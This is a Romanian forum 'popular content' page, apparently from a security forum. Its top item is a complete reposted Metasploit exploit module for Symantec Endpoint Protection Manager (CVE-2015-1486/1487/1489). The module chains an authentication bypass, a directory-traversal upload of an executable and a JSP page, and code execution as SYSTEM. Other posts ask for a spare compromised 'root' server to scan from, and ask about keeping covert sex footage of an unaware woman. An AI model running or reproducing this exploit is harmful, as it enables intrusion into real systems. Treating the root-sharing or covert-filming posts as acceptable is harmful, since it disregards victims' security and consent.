Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 08/18/15 in all areas

  1. ## # This module requires Metasploit: [url=http://metasploit.com/download]Penetration Testing Tool, Metasploit, Free Download | Rapid7[/url] # Current source: [url]https://github.com/rapid7/metasploit-framework[/url] ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution', 'Description' => %q{ This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities include an authentication bypass, a directory traversal and a privilege escalation to get privileged code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'Markus Wulftange', #discovery 'bperry' # metasploit module ], 'References' => [ ['CVE', '2015-1486'], ['CVE', '2015-1487'], ['CVE', '2015-1489'], ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html'] ], 'DefaultOptions' => { 'SSL' => true }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { 'Arch' => ARCH_X86, 'Payload' => { 'DisableNops' => true } } ], ], 'Privileged' => true, 'DisclosureDate' => 'Jul 31 2015', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(8443), OptString.new('TARGETURI', [true, 'The path of the web application', '/']), ], self.class) end def exploit meterp = Rex::Text.rand_text_alpha(10) jsp = Rex::Text.rand_text_alpha(10) print_status("#{peer} - Getting cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', 'vars_post' => { 'ActionType' => 'ResetPassword', 'UserID' => 'admin', 'Domain' => '' } }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way") end cookie = res.get_cookies if cookie.nil? || cookie.empty? fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie") end exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%> <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %> } print_status("#{peer} - Uploading payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', 'vars_get' => { 'ActionType' => 'BinaryFile', 'Action' => 'UploadPackage', 'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe", 'KnownHosts' => '.' }, 'data' => payload.encoded_exe, 'cookie' => cookie, 'ctype' => '' }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way") end register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe") print_status("#{peer} - Uploading JSP page to execute the payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', 'vars_get' => { 'ActionType' => 'BinaryFile', 'Action' => 'UploadPackage', 'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp", 'KnownHosts' => '.' }, 'data' => exec, 'cookie' => cookie, 'ctype' => '' }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way") end register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp") print_status("#{peer} - Executing payload. Manual cleanup will be required.") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp") }, 5) end end Source: https://dl.packetstormsecurity.net/1508-exploits/sepm_auth_bypass_rce.rb.txt
    1 point
  2. sp flash tool 3.1352 sp flash tool 3.1344 1.Incearca astea 2 versiuni de sp flash tool ca uploadul e bun acum lam verificat folderul sa fie in aceeasi folder cu flash tool 2.Folder sp flash tool sa fie in C:Program files 3.Pornestel cu click dreapta Run as administrator 4.Ce windows ai?
    -1 points
  3. Draga Bogdan, Din moment ce esti un membru nou pe forum, tin sa te anunt ca s-a specificat de multe ori: chat-ul nu are nici o legatura cu forumul. El se afla acolo pur si simplu pentru a comunica liber si a discuta orice subiect se doreste. Mai mult, daca citeai ceea ce scrie imediat cum iti apare chat-ul, aflai ca adminii / moderatorii au voie sa faca ceea ce doresc intrucat si-au meritat intr-un fel sau altul dreptul de a fii in postura anterior mentionata. Banul pe chat iti va fii scos in momentul in care un admin va considera ca e cazul sa ti-l scoata. In cazul in care nu iti place sa frecventezi forumul, du-te pe altul. Aici nu ducem lista de useri. ( totusi recomand sa inveti cate ceva de pe-aici - sunt tutoriale foarte misto si ai ce invata de la multi membrii ) Peace
    -1 points
  4. va rog daca aveti un root de gosh sau mix care nu-l mai folositi sa mi-l dati va rog frumos ca mi-au bubuit toate root-urile si vreu sa dau si el a scan PS : nu cred ca muriti pentru un root ....
    -1 points
  5. pentru motive personale am fost nevoit sa pun o camera ascunsa la mine in casa, am chemato pe o doamna la mine sa facem sex si am filmato, aceasta filmare nu va fi folosita pentru santaj sau alte lucruri ilegale (motivul e altul) clar ca persoana in cauza nu stie de existenta acestei filmari. aceasta filmare o pot detine legal in pc ? trebuie neaparat sa o criptez/ascund bine ? va rog raspunsuri on-topic
    -1 points
  6. Salut, sunt bogdan am 16 ani si am o pasiune pentru it. In primul rand as dori sa intreb cat timp mai tine banul pe chat, si as dori sa imi cer scuze pentru ce am vorbit pe chat. In al doilea rand este cel mai "ciudat" forum unde moderatori injura ca la cort si nu mai spun de membri. Am o intrebare, aveti ceva cu copi sub 18 ani? Ce ei nu sunt tot oameni ca voi? Acum sa vad cum ma criticati/injurati ca pe aici observ eu ca este la moda injuratu/criticatu fara rost.
    -1 points
×
×
  • Create New...